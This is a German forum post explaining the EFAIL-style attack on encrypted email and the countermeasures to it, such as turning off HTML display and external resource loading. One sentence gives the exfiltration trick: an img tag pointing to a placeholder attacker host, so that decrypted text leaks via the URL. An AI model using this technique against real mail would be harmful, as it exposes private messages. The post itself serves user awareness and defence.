nicht angemeldet
AugeHallo
wie der Titel schon sagt: es ist einem Angreifer möglich, die Entschlüsselten Emails abzugreifen. Es handelt sich sowohl um einen Bug (erster Angriff) als auch um ein systematisches Problem (zweiter Angriff).
Die EFF empfiehlt zur Zeit keine Emails mehr zu entschlüsseln (sic! dieser Teil ist wichtig!) bis es Patches gibt.
Auf Heise.de gibt es mittlerweile mehrere Artikel [1], die sich mit den Angriffswegen und den möglichen Gegenmaßnahmen beschäftigen.
Long story (mehr oder minder) short, der Angreifer manipuliert als Man in the Middle die Nachricht vor deren Ankunft beim Adressaten und fasst den verschlüsselten Nachrichtentext beispielsweise in ein img-Tag ein. Vor den Inhalt kommt <img href="https://angreifer.example.com? und hinter ihn ">, so dass der Nachrichtentext beim Empfänger als URL-Parameter gerendert wird. Sind im E-Mail-Programm HTML-E-Mails und das nachladen externer Ressourcen erlaubt, gelangt der Nachrichteninhalt als Bestandteil der URL zum Server des Angreifers, wo der ihn mindestens aus den Logfiles kratzen kann. Es gibt weitere, im Prinzip ähnlich funktionierende Angriffswege.
Das Abschalten zumindest des nachladens externer Ressourcen hinterlässt die entschlüsselte E-Mail in manipuliertem aber funktionslosem Zustand. Mit dem zusätzlichen abschalten der HTML-Anzeige von E-Mails ist der Angriffsweg nach aktuellem Kenntnisstand verbaut. Viele E-Mails lassen sich so allerdings nicht anzeigen, weil deren Ersteller sich keine Mühe geben, zugängliche E-Mails zu erzeugen [2]. Dafür müsste man denen auf die Schuhe pissen, aber das interessiert die allermeisten wohl nicht die Bohne.
Generell sicher wären verschlüsselte E-Mails erst, wenn ihre Integrität nachweisbar wäre. Also, dass nachweisbar wäre, dass sie auf dem Weg von ihrer Verschlüsselung zu ihrer Entschlüsselung nicht manipuliert wurden. S/MIME kann das nicht, OpenPGP schon, allerdings ist das, laut Heise-Artikel, nicht überall implementiert. Und selbst dann kann der Angreifer die entsprechenden Stellen aus der E-Mail entfernen. Sie ist dann kaputt, viele Clients versuchen dennoch etwas darzustellen, was dann wiederum manipuliert ist.
Tschö, Auge
Eine Kerze stand [auf dem Abort] bereit, und der Almanach des vergangenen Jahres hing an einer Schnur. Die Herausgeber kannten ihre Leser und druckten den Almanach auf weiches, dünnes Papier.
Kleine freie Männer von Terry Pratchett